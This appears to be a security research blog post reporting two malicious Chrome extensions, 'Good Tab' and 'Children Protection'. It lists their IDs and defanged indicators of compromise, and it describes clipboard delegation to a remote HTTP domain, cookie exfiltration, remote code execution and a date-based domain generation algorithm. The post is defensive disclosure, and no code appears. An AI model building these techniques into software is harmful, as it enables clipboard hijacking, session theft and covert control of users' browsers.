Chrome Extensions - Are you getting more than you bargained for?

Our security research has uncovered several malicious Chrome extensions that compromise user security. These extensions, with a combined user base exceeding 100,000 users, employ tactics ranging from granting clipboard access to untrusted external domains to using command-and-control (C&C) infrastructure with domain generation algorithms. Even though the official Google Chrome Web Store employs various steps to filter out potentially malicious extensions, some inevitably still make it through the vetting process, putting unsuspecting users at risk.

One example is the extension named ‘Good Tab’, with Extension ID: glckmpfajbjppappjlnhhlofhdhlcgaj. This extension, marketed as a customizable new tab page, presents an undisclosed risk of clipboard delegation to remote HTTP content. Its Chrome Web Store description makes no mention of clipboard access or external domains. However, under the hood, the extension’s new tab page contains an iframe that grants full clipboard permissions to an external domain to enable remote clipboard-read and clipboard-write permissions to a suspicious domain via the allow attribute. This access is allowed via insecure HTTP, which could enable interception of data transmitted or other adversary-in-the-middle (AiTM) attack scenarios. The extension fetches a payload from a suspicious domain that, in turn, references a separate highly obfuscated JavaScript file that loads Baidu analytics (hm.baidu[.]com) and additional third-party tracking scripts. The security implications of these findings are that an attacker could see everything copied to the clipboard or inject content to the clipboard unknown to the user. Examples of where this could be risky include when users attempt to copy/paste sensitive data such as passwords, keys, or tokens for authentication or transactions. It enables the check-and-switch tactic that has long been used by attackers to redirect cryptocurrency transactions by switching destination wallet addresses.

Another concerning extension is ‘Children Protection’, with Extension ID: giecgobdmgdamgffeoankaipjkdjbfep. This extension poses risks including remote code execution, C&C infrastructure, and cookie/data exfiltration. While marketed as a parental control tool, it implements a full C&C framework with capabilities that go far beyond what is required by any legitimate parental control application. Our research found ample evidence of highly suspect practices, such as the use of anti-analysis techniques like splitting strings into chunks as a rudimentary way to obfuscate code, which leaves questions about what the developers are trying to hide. What’s worse is that the extension has the ability to harvest cookies from the browser. The cookies are collected together and then later exfiltrated to a remote site. Exfiltration of cookies is highly suspicious behavior commonly carried out by attackers to enable session hijacking. The extension also uses a domain generation algorithm (DGA) to generate domains for exfiltration. This is used as a fallback mechanism should connections to the primary C&C domain at codon[.]vn/ext/xmshield.json fail. This type of DGA behavior is typically used by malware to provide resilience to their C&C infrastructure. The DGA uses the current date with base-36 encoding to generate URLs such as https:k8n1z40[.]live/k8n1z40.json, with a new domain generated every day. Perhaps the most egregious functionality is the C&C framework that can be used to execute remote code.

To read the complete article see: Full Article